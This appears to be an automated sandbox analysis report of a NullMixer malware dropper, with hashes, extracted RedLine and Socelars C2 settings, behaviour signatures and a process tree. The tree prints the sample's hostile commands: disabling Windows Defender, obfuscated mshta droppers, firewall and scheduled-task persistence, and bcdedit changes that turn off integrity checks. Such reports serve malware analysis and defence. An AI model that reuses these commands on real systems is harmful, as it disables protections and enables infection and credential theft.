Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    06/11/2024, 10:40 UTC

General

  • Target

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

  • Size

    19.5MB

  • MD5

    929d44bb23bdaf1900b64c607b0d79f5

  • SHA1

    b24c6b9ffe07f42848b1b216127ae4031f7dc284

  • SHA256

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa

  • SHA512

    2c7fbd126ae014d876e86a489f5cfd633f29c70009380f6e459ce2b25c9c2a533d7217472c99f2e5687d16b72b8bed7ac3a2acb510fffc5ca5f77898f6b217ee

  • SSDEEP

    393216:xmdgzx7vz4dPQEf92YI+20uaVccpGaX/mlUBbRgAhRasJBg4qXRQvXowf:Mdgzt74ak9JU0u0nTPmWFRgAJxvYwf

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

Botnet

user2211

C2

135.181.129.119:4805

Attributes
  • auth_value

    222774f9cd78b757b41900a0740f5b77

Extracted

Family

redline

Botnet

media22m11

C2

91.121.67.60:51630

Attributes
  • auth_value

    67c1e9660a9418bffb56bc0010363b04

Extracted

Family

redline

Botnet

Publisher2

C2

135.181.79.37:10902

Attributes
  • auth_value

    e8393a62fb4a9e46504192de2bb05302

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is a Facebook account info stealer.

  • Fabookie family
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • Nullmixer family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars family
  • Socelars payload 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
    "C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:352
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
          Mon166dc6040fb8726.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2572
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
          Mon16bd4a93b822a.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:804
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1596
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon1661118952.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1920
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
          Mon1661118952.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1672
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:616
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2772
              • C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE
                WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2556
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2452
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2492
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN( "C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W " , 0 , TrUe ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:1048
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1300
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" ECho "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2144
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1764
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 -s aGKpQ.W
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:316
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill -IM "Mon1661118952.exe" -F
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1292
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2128
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
          Mon16b7581baf7.exe /mixtwo
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1624
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
          Mon167f9db638e4.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
          • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"
            5⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2480
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              6⤵
              PID:1632
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  7⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2620
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe /306-306
                6⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2508
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1772
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  7⤵
                  PID:2004
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:2756
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1812
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2512
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2160
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:888
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1484
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2420
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1304
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2504
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2564
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2820
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2788
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2688
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1528
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    7⤵
                    • Executes dropped EXE
                    PID:2104
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2120
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2300
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1032
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
              Mon1618e4439d986270.exe
              4⤵
              • Executes dropped EXE
              PID:372
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
              Mon1631358b82299bd8.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1480
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2460
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:584
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2588
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
              Mon16d070a064013c841.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2016
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2132
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
              Mon16734014a69dec.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1508
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1868
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3000
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
              Mon16737798ac26f984.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1928
              • C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1948
                • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1068
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
              Mon164c5af508c3.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2896
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
              Mon16957e622fa390.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:956
              • C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:292
                • C:\Program Files (x86)\Gparted\Build.sfx.exe
                  "C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  PID:588
                  • C:\Program Files (x86)\Gparted\Build.exe
                    "C:\Program Files (x86)\Gparted\Build.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3000
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:892
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672
                      8⤵
                      • Program crash
                      PID:1228
                • C:\Program Files (x86)\Gparted\gimagex.exe
                  "C:\Program Files (x86)\Gparted\gimagex.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:492
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2940
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
              Mon16ac385cfd.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2368
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2992
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
              Mon16e127a54386dd68.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1100
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2216
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2984
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
              Mon161bd381a14aea5c.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1448
      • C:\Windows\servicing\TrustedInstaller.exe
        C:\Windows\servicing\TrustedInstaller.exe
        1⤵
        PID:1100
        • C:\Windows\system32\makecab.exe
          "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab
          2⤵
          • Drops file in Windows directory
          PID:2108
      • C:\Windows\system32\conhost.exe
        \??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"
        1⤵
        PID:2492
      • C:\Windows\system32\wbem\WMIADAP.EXE
        wmiadap.exe /F /T /R
        1⤵
        PID:1300
      • C:\Windows\system32\conhost.exe
        \??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"
        1⤵
        PID:2016
